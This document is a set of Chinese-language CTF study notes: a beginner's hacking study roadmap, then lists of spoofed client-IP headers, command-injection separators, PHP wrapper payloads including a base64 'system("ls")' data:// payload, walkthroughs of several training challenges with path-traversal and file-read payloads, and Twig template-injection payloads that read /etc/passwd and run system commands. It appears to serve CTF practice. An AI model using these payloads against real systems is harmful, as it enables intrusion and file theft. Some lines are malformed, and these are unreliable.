ctf笔记

黑客零基础入门学习路线&规划
初级黑客
1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）
2、渗透测试基础（一周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础（一周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）
4、计算机网络基础（一周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）
常用的网址
1 Client-IP:127.0.0.1
2 Forwarded-For-Ip: 127.0.0.1
3 Forwarded-For: 127.0.0.1
4 Forwarded-For: localhost
5 Forwarded:127.0.0.1
6 Forwarded: localhost
7 True-Client-IP:127.0.0.1
8 X-Client-IP: 127.0.0.1
9 X-Custom-IP-Authorization : 127.0.0.1
10 X-Forward-For: 127.0.0.1
11 X-Forward: 127.0.0.1
12 X-Forward: localhost
13 X-Forwarded-By:127.0.0.1
14 X-Forwarded-By: localhost
15 X-Forwarded-For-Original: 127.0.0.1
16 X-Forwarded-For-original: localhost
17 X-Forwarded-For: 127.0.0.1
18 X-Forwarded-For: localhost
19 X-Forwarded-Server: 127.0.0.1
20 X-Forwarded-Server: localhost
21 X-Forwarded: 127.0.0.1
22 X-Forwarded: localhost
23 X-Forwared-Host: 127.0.0.1
24 X-Forwared-Host: localhost
25 X-Host: 127.0.0.1
26 X-Host: localhost
27 X-HTTP-Host-Override : 127.0.0.1
28 X-Originating-IP: 127.0.0.1
29 X-Real-IP: 127.0.0.1
30 X-Remote-Addr: 127.0.0.1
31 X-Remote-Addr : localhost
32 X-Remote-IP: 127.0.0.1
看到ping命令就可以利用截断来执行新的命令。
首先测试所有的截断符号：
‘$’
‘;’
‘|’
‘-’
‘(’
‘)’
‘反引号’
‘||’
‘&&’
‘&’
‘}’
‘{’
'%0a’可以当作空格来用；

常用伪协议用法：
1.php伪协议
用法
php://input,用于执行php代码，需要post请求提交数据。
php://filter,用于读取源码，get提交参数。?a=php://filter/read=convert.base64/resource=xxx.php
需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp
不需要开启allow_url_fopen:php://filter
2.、data协议
用法：
data://text/plain,xxxx(要执行的php代码)
data://text/plain;base64,xxxx(base64编码后的数据)
例：
?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
3.、file协议

原文链接：https://blog.csdn.net/Mr_helloword/article/details/107929653

1,web2攻防世界

编写脚本

2,fileclude攻防世界

代码审计
发现file1包含在里面
所以构造 file1=php://filter/read=convert.base64-encode/resource=flag.php 用来读取源码12行中文件flag.php中的语句~
其中php://filter/read=执行文件读取功能
convert.base64-encode执行Base64编码功能；
/resource=flag.php填写flag.php所在的目录~
编写 file2=php://input 表示访问语句
并且加上hello ctf用来进行访问
利用bp进行抓包，出现base64编码的一串字符
进行解码，即可出现flag
3，easyphp攻防世界
绕过 a 参数验证
思路：按照条件需要满足 intval($a) > 6000000 且 strlen($a) <= 3，可以利用 PHP 中科学计数法的特性来绕过长度限制同时满足整数大小要求。例如，在 PHP 中 9e9 这样的表示会被 intval 转换为 9000000000，符合大于 6000000 的条件，且字符串长度只有 3。
示例：在请求时传递参数 a=9e9 来尝试绕过该部分验证。
绕过 b 参数验证
思路：要使得 '8b184b' === substr(md5($b),-6,6) 成立，通过编写一个简单的暴力破解脚本去尝试大量不同的字符串，计算其 MD5 值并检查后 6 位是否符合要求。
示例脚本（Python 示例，用于生成符合要求的字符串，实际使用时可根据情况调整）：
收起
python

import hashlib

for i in range(1000000):
s = str(i).encode('utf-8')
md5_value = hashlib.md5(s).hexdigest()
if md5_value[-6:] == '8b184b':
print(i)
break

运行上述脚本后，如果找到符合要求的字符串（假设找到的字符串是
test），则在请求时传递参数
b=test 去绕过这部分验证。

warmup
打开代码发现
source.php
发现源代码

发现 $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
所以把hint.php加入URL发现flag not here, and flag in ffffllllaaaagggg
接着看有四个IF句
最后有是利用file传递，其中/../../../../为传递
构造?file=hint.php?/../../../../ffffllllaaaagggg
常用的twig的zhu
常用的twig的注入 ssti注入，那就进行ssti注入测试，payload：{{2*2}}
{{'/etc/passwd'|file_excerpt(1,30)}}
{{app.request.files.get(1).__construct('/etc/passwd','')}}
{{app.request.files.get(1).openFile.fread(99)}}
{{_self.env.registerUndefinedFilterCallback("exec")}}
{{_self.env.getFilter("whoami")}}
{{_self.env.enableDebug()}}{{_self.env.isDebug()}}
{{["id"]|map("system")|join(","){{{"
{{["id",0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0,0]|reduce("system","id")|join(",")}}